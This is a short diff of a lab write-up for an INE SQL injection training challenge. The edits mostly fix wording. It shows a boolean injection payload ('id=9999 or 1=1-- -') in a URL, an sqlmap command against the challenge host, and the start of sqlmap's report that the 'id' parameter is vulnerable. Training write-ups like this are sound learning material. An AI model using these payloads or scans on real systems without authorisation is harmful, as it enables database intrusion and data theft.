cyberaguiar/ine-challenges/web-application-penetration-testing/sql-injection/challenge-1.md

 http://1.challenge.sqli.site/view_book.php?id=9999%20or%201=1--%20-

-There are no book with number 9999, as the secont part of the payload is 1=1, this will match all books, and so, the page show the first retrieved.
+There is no book with number 9999, as the second part of the payload is 1=1, this will match all books, and so, the page show the first retrieved.

-Send the original url to sqlmap.
+Send the original url to SQLMap.

 sqlmap -u http://1.challenge.sqli.site/view_book.php?id=1 --batch --dbms=mysql

-After a few moments sqlmap will return with the follow results.
+After a few moments SQLMap will return with the follow results.

 GET parameter 'id' is vulnerable.
 Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests: